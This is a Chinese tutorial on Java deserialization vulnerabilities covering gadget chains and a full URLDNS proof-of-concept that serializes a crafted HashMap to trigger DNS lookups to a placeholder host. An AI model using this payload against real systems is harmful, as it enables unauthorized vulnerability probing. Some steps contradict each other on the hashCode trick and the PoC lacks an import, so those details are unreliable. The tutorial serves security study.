Java反序列化漏洞

1. 序列化与反序列化

面向对象的世界中，数据封装为类的属性，对数据进行处理的算法或者说逻辑封装为类的方法，程序的结构就是对象的调用。我们面向对象开发，当然希望对象可以复用，所以需要传输或存储对象。

---

程序运行后是存放在内存中的，我们在源代码中new Student("mingsec",7)，这个类及对象是JVM在负责管理，其在内存中的物理结构可能是散乱在各个物理地址空间的01比特流，也可能是一段连续的地址空间。JVM抽象了底层的一切，使Java程序员可以以“面向对象”这种逻辑视图进行程序开发。

要想将内存中的一个对象发送给另一台机器上的JVM进程使用，就需要足够的信息：

• 对象的类型（是什么类）
• 对象的状态（属性的值）
• 附加信息

那么，我们就需要定义一个数据格式，规定提取出来的对象数据是怎样组织的。与之相对应我们需要两个程序：

• 读取类元数据、内存中的对象状态等信息，输出一个规范格式字节流/字符流（序列化）
• 读取一个规范格式的字节流/字符流，解析输出一个对象（反序列化）

这是一个很自然而然的过程。我们在本地创建对象，首先需要有一个类，然后通过new关键字调用构造方法给对象赋值。将一个对象序列化，就需要告诉对方类名以及属性的值，对方就可以通过读取类名加载类并创建对象，读取属性值并给创建的对象赋值。

2. Java原生序列化与反序列化

学习过PHP的应该知道，PHP中的序列化是将对象组织为一个字符流，即一个字符串。在Java原生提供的序列化中，输出的是一个字节流，即一个byte[]数组或者二进制数据文件。

关于Java中序列化的格式规范，官方文档给出了详细说明，也在相应的类中定义了格式标记位。想要深入了解规范，追着AI问或者自行阅读官方文档。

Java中的对象想要支持序列化，其类需要实现Serialiable接口。这个接口只起到标记作用，告诉JVM该类的对象是可序列化的。实现序列化和反序列化的功能分别由java.base模块（jdk9+）里的java.io包下的ObjectOutputStream的writeObject()方法和ObjectInputStream的readObject()方法提供，下图给出一个序列化的demo.

---

Java序列化的数据以标记AC ED 00 05开头，base64编码的特征为rO0AB。我们看一下官方文档协议格式定义给的类源码：

2.1 Java原生方法调用链

1. 序列化主要方法调用链（Java 层面 → JVM 本地方法）：

ObjectOutputStream.writeObject(Object obj)→ writeObject0(Object obj, boolean unshared)→ writeOrdinaryObject(Object obj, ObjectStreamClass desc, boolean unshared)→ writeSerialData(Object obj, ObjectStreamClass desc)→ DataOutputStream.writeInt(int val)→ JVM_WriteInt (C/C++ 实现) // 本地方法写入基本类型

2. 反序列化主要方法调用链（Java 层面 → JVM 本地方法）：

ObjectInputStream.readObject()→ readObject0(boolean unshared)→ readOrdinaryObject(boolean unshared)→ ObjectStreamClass.newInstance() → JVM_NewInstanceFromConstructor (C/C++ 实现) // 本地方法创建对象→ readSerialData(Object obj, ObjectStreamClass desc)→ Field.set(Object obj, Object value) → JVM_SetField (C/C++ 实现) // 本地方法设置字段值

2.2 自定义writeObject()和readObject()

Java支持在类中自定义 readObject 和 writeObject，允许开发者细粒度控制序列化和反序列化过程。

为什么自定义的 readObject() 或writeObject() 方法会被调用？

1. Java 序列化机制的约定
   Java 的序列化机制在反序列化时，会检查目标类是否定义了以下方法：

private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException

如果该方法存在，Java 会通过反射机制调用该方法，而不是使用默认的反序列化逻辑。这是 Java 序列化机制的一个约定，用于支持类级别的自定义反序列化逻辑。

2. 反射机制的调用
   Java 的 ObjectInputStream 在反序列化一个对象时，会执行以下步骤：
   • 检查目标类是否有自定义的 readObject() 方法。
   • 如果有，通过反射调用该方法。
   • 如果没有，则使用默认的反序列化逻辑（即逐个读取字段值并赋值给对象）。

这种机制是通过 ObjectStreamClass 类实现的。ObjectStreamClass 会缓存类的序列化方法信息，并在反序列化时调用相应的 invokeReadObject() 方法。

3. Java反序列化漏洞

反序列化漏洞的本质是：在反序列化过程中，攻击者通过构造特定的字节流（序列化后的对象），触发目标系统中已有的类或方法的调用链，最终执行恶意代码。

主要的点是2个：

1. 直接反序列化用户输入
2. 可被触发的利用链（Gadget Chains）
   • 依赖库漏洞：第三方库（如Apache Commons Collections、Jackson、Fastjson）存在可利用的Gadget Chain（利用链）
   • readObject()方法滥用：自定义类若重写readObject()方法且未进行安全检查，可能直接执行危险操作。
   • 反序列化时的类加载：反序列化会自动加载并实例化类，若未限制可反序列化的类范围，攻击者可加载恶意类。

没有过滤直接反序列化用户输入是入口，目标系统中存在可触发的漏洞利用链才是反序列漏洞的本质。接下来就就是介绍利用链的概念，并通过实际的例子来理解什么是利用链。

3.1 Gadget Chains（利用链）

• Gadget：一个可被利用的类或方法，通常具有副作用（如调用 exec 执行命令）。
• Chain：将多个 Gadget 串联起来，形成一个逻辑上连续的调用链，最终达到攻击目标。

Gadget Chain是攻击者精心构造的对象方法调用链，通过在反序列化过程中触发某些类的特定方法（如readObject、hashCode、equals等），最终执行恶意代码（如命令执行、内存马注入等）。

Gadget Chain的本质是通过反序列化触发一系列方法调用，最终执行恶意代码。构造过程需满足：

• 入口点（Entry Point）：反序列化操作的触发点（如Shiro的RememberMe Cookie）。
• 链式调用（Method Chaining）：多个类的方法按顺序触发，形成“链”。
• 执行终点（Sink）：最终执行危险操作的方法（如Runtime.exec()）。

3.2 Object Graph（对象图）

对象图：

• 由多个对象组成的树状或网状结构，每个对象可能包含其他对象的引用。反序列化过程中恢复的对象之间的引用关系图。
• Java在反序列化时，会递归重建对象及其所有关联对象（成员变量、数组、集合等），形成一个复杂的嵌套结构。

3.3 Gadget Chains与Object Graph的关系

依赖与协作

• Gadget Chains是逻辑路径：
  定义攻击者希望执行的代码路径（如从PriorityQueue到Runtime.exec()）。
• Object Graph是物理载体：
  通过构造特定的对象图，使反序列化过程按Gadget Chains的逻辑执行。

攻击流程

1. 构造恶意Object Graph：
   攻击者根据目标环境中的可用Gadget Chains，设计一个包含触发链的对象图。

2. 序列化Object Graph：
   将对象图转换为字节流（如使用ObjectOutputStream）。

3. 触发反序列化：
   将恶意字节流发送至目标（如通过Shiro的RememberMe Cookie）。

4. 自动执行Gadget Chains：
   反序列化时，JVM按对象图重建对象，触发链式调用。

5. URLDNS链分析

1. 概述
URLDNS链是Java反序列化漏洞中的一条经典利用链，由java.util.HashMap和java.net.URL类构成。它的核心目的是通过反序列化操作触发目标主机对指定域名的DNS请求，从而验证是否存在Java反序列化漏洞。由于该链仅依赖Java内置类，且无第三方库依赖，常用于漏洞探测。

---

2. 核心原理
调用链流程：

HashMap.readObject()  → HashMap.putVal()  → HashMap.hash(key)  → key.hashCode() (URL对象)  → URLStreamHandler.hashCode()  → InetAddress.getHostAddress()  → DNS解析

3. 关键类与方法

• HashMap：实现了Serializable接口，反序列化时会调用readObject()方法，进而触发putVal()。
• URL：实现了Serializable接口，其hashCode()方法会调用getHostAddress()，触发DNS解析。
• InetAddress：getHostAddress()方法会向指定域名发起DNS请求。

---

4. 利用链触发条件

1. 反序列化入口：目标系统需存在Java反序列化入口（如Shiro的rememberMe Cookie）。
2. 对象结构：构造一个包含URL对象作为键的HashMap，并确保URL的hashCode为-1。
3. DNS请求：反序列化时，HashMap.readObject()会调用URL.hashCode()，触发DNS解析。

---

5. 对象图构造
目标：构造一个HashMap对象，其键为URL对象，并确保URL的hashCode为-1，避免在put时提前触发DNS请求。

步骤：

1. 创建URL对象：

   URL url = new URL("http://your-dns-server.com");
   

2. 反射修改hashCode：

   Field hashCodeField = URL.class.getDeclaredField("hashCode");
   hashCodeField.setAccessible(true);
   hashCodeField.setInt(url, -1);  // 设置hashCode为-1，避免提前触发DNS解析
   

3. 构造HashMap并添加URL对象：

   HashMap<URL, String> map = new HashMap<>();
   map.put(url, "value");  // put时不会触发DNS解析
   

4. 序列化对象：

   ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("payload.ser"));
   oos.writeObject(map);  // 序列化为二进制文件
   oos.close();
   

最终对象图：

HashMap
├── key: URL("http://your-dns-server.com")
│   ├── hashCode: -1
└── value: "value"

---

6. 反序列化触发DNS请求

1. 反序列化时触发：

   ObjectInputStream ois = new ObjectInputStream(new FileInputStream("payload.ser"));
   ois.readObject();  // 触发HashMap.readObject()
   ois.close();
   

2. 触发流程：

   • HashMap.readObject() → putVal() → hash(key) → key.hashCode()
   • URL.hashCode() → URLStreamHandler.hashCode(this) → getHostAddress() → DNS解析

---

7. 问题与解决方案
问题1：直接put时会触发DNS请求

• 原因：HashMap.put()会调用hash(key) → key.hashCode()，导致DNS解析提前触发。
• 解决方案：通过反射将URL的hashCode设置为-1，反序列化后再恢复为-1。

问题2：如何避免提前触发DNS请求

• 代码修复：

  // put前修改hashCode为非-1值
  hashCodeField.setInt(url, 0);
  map.put(url, "value");
  // put后恢复hashCode为-1
  hashCodeField.setInt(url, -1);
  

---

8. 完整POC代码

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;public class URLDNS {public static void main(String[] args) throws Exception {// 1. 创建URL对象URL url = new URL("http://your-dns-server.com");// 2. 反射修改hashCode为-1Field hashCodeField = URL.class.getDeclaredField("hashCode");hashCodeField.setAccessible(true);hashCodeField.setInt(url, 0);  // put前设置为非-1值// 3. 构造HashMap并添加URLHashMap<URL, String> map = new HashMap<>();map.put(url, "value");// 4. 恢复hashCode为-1hashCodeField.setInt(url, -1);// 5. 序列化ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("payload.ser"));oos.writeObject(map);oos.close();// 6. 反序列化触发DNS请求ObjectInputStream ois = new ObjectInputStream(new FileInputStream("payload.ser"));ois.readObject();ois.close();}
}

---

9. 漏洞触发流程总结

6. 参考

[1] Java序列化格式详解
[2] 官方文档：Java Object Serialization Specification
[3] Java安全小白的入门心得 - java反序列化
[4] 通义qwen3
[5] deepseek